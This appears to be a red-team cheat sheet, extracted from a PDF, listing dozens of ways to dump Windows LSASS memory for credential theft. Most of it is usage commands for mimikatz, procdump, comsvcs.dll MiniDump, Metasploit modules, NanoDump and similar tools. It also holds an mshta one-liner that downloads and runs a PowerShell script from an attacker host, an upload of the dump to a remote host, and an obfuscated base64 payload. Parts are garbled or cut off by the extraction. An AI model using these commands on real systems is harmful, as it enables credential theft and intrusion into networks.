50 Methods For Dump LSASS
50 Methods For Dump LSASS
Usage
Sekurlsa::logonpasswords
Sekurlsa::minidump
lsadump::dcsync
Usage
procdump -ma lsass.exe lsass.dmp
procdump -accepteula -64 -ma lsass.exe
lsass.dmp
Usage
System->LSASS process->Create Dump
Usage
tasklist /FI "IMAGENAME eq lsass.exe"
DumpIt.exe PID output_file_name.bin
Usage
windbg -p <lsass process id>
.dump /ma c:\path\to\lsass.dmp
.detach
.q
Usage
Create Disk Image
Physical Drive
Capture Memory
LSASS.exe
Usage
Pstree
volatility -f memory_dump.raw --
profile=Win7SP1x64 memdump -p
<lsass_pid> -D <output_directory>
Usage
winpmem.exe -o dump.raw
Usage
windbg.exe -y
srv*c:\symbols*http://msdl.microsoft.com/downloa
d/symbols -i c:\symbols -z C:\hiberfil.sys
Yes
!process 0 0 lsass.exe
!process 0 0 lsass.exe; .dump /ma <output file
path>
Usage
HKLM\SOFTWARE\Microsoft\Windows\Windo
ws Error Reporting\LocalDumps-
>DumpType->2
Lsass-Shtinkering.exe
Usage
LiveKd.exe -w
!process 0 0 lsass.exe
.process /p [lsass PID]
.dump /ma [dump file path]
Usage
Powershell -ep bypass
Get-Process lsass
C:\Windows\System32\Taskmgr.exe
/dumpfile=C:\lsass.dmp /pid=<LSASS_PID>
Usage
Execute-assembly
SharpDump
Or
load sharpdump
sharpdump
Usage
Mimikatz_command
sekurlsa::minidump
Usage
taskkill /f /im lsass.exe
Usage
load sysinternals
Procexp
"File" -> "Save"
Usage
cmd /c cmd /c Schtasks.exe /create /RU SYSTEM /SC
Weekly /D SAT /TN Commands /TR \"''rundll32.exe''
C:\\windows\\system32\\comsvcs.dll MiniDump
"+strPID+" C:\\Windows\\Tasks\\dump.bin full\" /ST
06:06:06 && Schtasks.exe /run /TN Commands &&
REM ' -Force;"
Usage
load kiwi
Lsa_dump_sam
lsa_dump_secrets
Usage
use post/windows/gather/credentials/lsassy
set SESSION <session ID>
Run or exploit
Usage
Create Task->Module->SharpKatz
Arguments->lsa_dump
Usage
Modules
credentials/mimikatz/lsass_dump
Execute or run
sekurlsa::minidump
Usage
use lsass_dump
Options
run
Usage
villain.exe agent
villain.exe client -c <IP_ADDRESS>
villain.exe dump lsass
Usage
pupy.exe shell --cmd "python -m
pupy.modules.pupywinutils.lsassdump -o
C:\temp\lsass.dmp"
Usage
lsassdump
Usage
MiniDumpWriteDump
Get-LsassDumpProcDump
Usage
NtQueryVirtualMemory
Get-LsassDumpNtQueryVirtualMemory
Usage
Get-LsassDumpBloodHound
Usage
mshta.exe javascript:A=new ActiveXObject("WScript.Shell").run("powershell -nop -w
hidden -c IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:
<port>/r.ps1')",0);close();
Manjusaka lsass dump
Usage
Dumpert.exe -k lsass.exe -s -o lsass.dmp
Usage
NanoDump.exe -t [process ID] -o [output file
path]
Usage
spraykatz.exe -w <domain> -u <username>
-p <password> --krb5i --mimikatz
"sekurlsa::minidump lsass.dmp" "exit"
Usage
HandleKatz.exe -p lsass.exe
HandleKatz.exe -p lsass.exe -o [handle ID] -
dump
Usage
CallbackDump.exe -d <dump_file_path> -p
<process_id>
Usage
LsassSilentProcessExit.exe <PID of LSASS.exe> <DumpMode>
Usage
AndrewSpecial
andrew.dmp!
Usage
.\Masky.exe /ca:'CA SERVER\CA NAME'
(/template:User) (/currentUser)
(/output:./output.txt) (/debug:./debug.txt)
Usage
SharpMiniDump.exe -p <lsass_process_id> -o lsass.dmp
Usage
MiniDump.exe /p <process_id> /o <output_file_name>
Usage
Import-Module .\ReflectiveLsassDump.dll
Invoke-ReflectivePEInjection -PEBytes (Get-
Content ReflectiveLsassDump.dll -Encoding
Byte) -ProcessID (Get-Process lsass).Id
Usage
MoonSolsWindowsMemoryToolkit.exe
Dumping->Launch DumpIt
LSASS->Select the process to dump
int main()
{
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ, FALSE, <lsass_process_id>);
if (hProcess == NULL)
{
printf("Failed to open process: %u\n", GetLastError());
return 1;
}
WCHAR dumpFileName[MAX_PATH];
Usage
swprintf(dumpFileName, MAX_PATH, L"lsass.dmp");
return 0;
}
REDTEAMRECIPE.COM ```
POWERED BY HADESS.IO
COMSVCS.DLL
Usage
regsvr32 comsvcs.dll
rundll32.exe
C:\Windows\System32\comsvcs.dll,
MiniDump lsass.exe lsass.dmp full
Usage
.\MirrorDump.exe -f "NotLSASS.zip" -d "LegitLSAPlugin.dll" -l 1073741824
Usage
dumpy.exe dump -k secretKey -u http://remotehost/upload force
Usage
.\procexp64.exe -accepteula /t
RToolZ -p <pid>
Usage
LsassUnhooker.exe -r <output_file_path>
SharpUnhooker.exe inject --process
lsass.exe --modulepath ReflectiveDLL.dll
SharpUnhooker.exe dump --process
lsass.exe --output lsass_dump.bin
Usage
Kldumper.exe
laZagne_x64.exe
PwDump7.exe
QuarksPwDump.exe
SqlDumper.exe
Wce_x64.exe
SAMInside.exe
Usage
BOAGEAbQBlAFMAdABpAG4AZwBdACkAIAB8ACAACgAkAH
MAdwB3AG8AcgBkACAAPQAgAFsAcwBdAC4AVwBpAG4AZA
BvAHcAbgBhAGwAaQB6AGUAXQAoAFsAUwB5AHMAdABlAG
0ALgBJAG4AdgBpAGQAZQBJAHQAKAAiAEMAaABhAG4AZAA
oAFsAUwB5AHMAdABlAG0ALgBDAG8AbQBwAHIAZQBzAGgA
ZQBuAGQAKQBdAC4AQQBzAHMAZQBtAGIAbABlAC4AVABvA
HAAYwBvAG4AcwB0AHIAYQB0AGUAZAAoACcAKwAnACsAJ
wApAC4AUABhAGMAZQBuAHQAYQB0AGUAUwB0AGkAbgBn
ACgAWwBTAHkAcwB0AGUAbQAuAEkAbgB2AGkAZABlAEkAd
Usage
.\BetterSafetyKatz.exe
.\BetterSafetyKatz.exe '.\mimikatz_trunk.zip'
Sekurlsa::minidump
POWERED BY HADESS.IO